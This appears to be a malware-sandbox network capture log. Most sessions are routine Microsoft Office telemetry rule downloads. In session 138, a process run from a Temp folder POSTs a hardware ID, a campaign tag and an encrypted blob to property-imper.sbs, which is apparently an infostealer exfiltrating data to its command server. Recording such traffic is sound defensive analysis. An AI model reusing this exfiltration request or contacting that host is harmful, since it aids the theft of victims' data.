2024-11-22 19:36:50 UTC	192	OUT	GET /rules/rule701800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:50 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:50 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BEA414B16" x-ms-request-id: 1aa9c07b-201e-0096-3276-3bace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193650Z-174c587ffdfb74xqhC1TEBhabc00000001t000000000r704 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:50 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.4	49900	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:50 UTC	192	OUT	GET /rules/rule701801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:50 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:50 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC2EEE03" x-ms-request-id: 18ec886b-801e-0078-7044-3cbac6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193650Z-178bfbc474bp8mkvhC1NYCzqnn00000003b0000000002cds x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:50 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.4	49903	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:50 UTC	192	OUT	GET /rules/rule701051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:51 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:51 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT ETag: "0x8DC582BE1CC18CD" x-ms-request-id: 21476416-401e-00a3-1c88-3a8b09000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193651Z-178bfbc474bv7whqhC1NYC1fg400000003dg00000000d6vk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:51 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.4	49904	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:50 UTC	192	OUT	GET /rules/rule701050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:51 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:51 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB256F43" x-ms-request-id: 4a98b9d9-501e-008c-636d-3bcd39000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193651Z-178bfbc474bbbqrhhC1NYCvw7400000003f000000000stez x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:51 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.4	49905	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:52 UTC	192	OUT	GET /rules/rule702751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:53 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:52 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB866CDB" x-ms-request-id: e8d3758b-d01e-0066-2757-3cea17000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193652Z-15b8b599d885v8r9hC1TEB104g00000001vg00000000hfx0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:53 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.4	49907	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:52 UTC	192	OUT	GET /rules/rule702750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:53 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:52 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE5B7B174" x-ms-request-id: cb244ee5-a01e-003d-2a49-3c98d7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193652Z-15b8b599d88tr2flhC1TEB5gk4000000021g00000000774u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:53 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.4	49908	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:52 UTC	192	OUT	GET /rules/rule702301v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:53 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:53 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT ETag: "0x8DC582BE976026E" x-ms-request-id: 85bacdce-f01e-003f-758c-3ad19d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193653Z-174c587ffdfmrvb9hC1TEBtn3800000001tg00000000s1hq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:53 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.4	49909	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:53 UTC	192	OUT	GET /rules/rule702300v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:53 UTC	515	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:53 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDC13EFEF" x-ms-request-id: a1d7de20-e01e-0051-6948-3c84b2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193653Z-178bfbc474bgvl54hC1NYCsfuw00000003fg000000002nm7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-22 19:36:53 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.4	49910	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:53 UTC	192	OUT	GET /rules/rule703401v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:53 UTC	515	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:53 GMT Content-Type: text/xml Content-Length: 1425 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6BD89A1" x-ms-request-id: 8abb671b-d01e-0049-4b0c-3de7dc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193653Z-178bfbc474b7cbwqhC1NYC8z4n00000003d0000000003604 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-22 19:36:53 UTC	1425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.4	49912	172.67.162.84	443	7288	C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:53 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=RKJDVGVIUVQ6BV5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18151 Host: property-imper.sbs
2024-11-22 19:36:53 UTC	15331	OUT	Data Raw: 2d 2d 52 4b 4a 44 56 47 56 49 55 56 51 36 42 56 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 30 30 43 34 30 32 30 34 33 36 39 42 41 31 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 52 4b 4a 44 56 47 56 49 55 56 51 36 42 56 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 4b 4a 44 56 47 56 49 55 56 51 36 42 56 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d Data Ascii: --RKJDVGVIUVQ6BV5Content-Disposition: form-data; name="hwid"CF00C40204369BA1D7CBBD6DF28D3732--RKJDVGVIUVQ6BV5Content-Disposition: form-data; name="pid"2--RKJDVGVIUVQ6BV5Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
2024-11-22 19:36:53 UTC	2820	OUT	Data Raw: 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 Data Ascii: Sh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q
2024-11-22 19:36:54 UTC	1014	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9p0rb0jk9847pp1vlkj6oeb15f; expires=Tue, 18-Mar-2025 13:23:33 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6oa0glJBTZTHmy%2BnUVm48so5nlJ0UJYWUQhZMWWIzTw1VhGVLfnkyubBIl2Z8HTHdXcx4C1f3aodAIcSo9fsQL1Xo5Ngs0huXvejpcGLdOE8gZhq3I%2F715KXK4Q9NG33NA9JVlQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6b5ef91c3441b2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2750&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2845&recv_bytes=19112&delivery_rate=562620&cwnd=217&unsent_bytes=0&cid=5950a79b8a8c9c83&ts=985&x=0"
2024-11-22 19:36:54 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-22 19:36:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.4	49913	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:54 UTC	192	OUT	GET /rules/rule703400v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:55 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:55 GMT Content-Type: text/xml Content-Length: 1388 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDBD9126E" x-ms-request-id: 607d0db8-301e-0052-4363-3b65d6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193655Z-178bfbc474bfw4gbhC1NYCunf400000003g000000000367b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
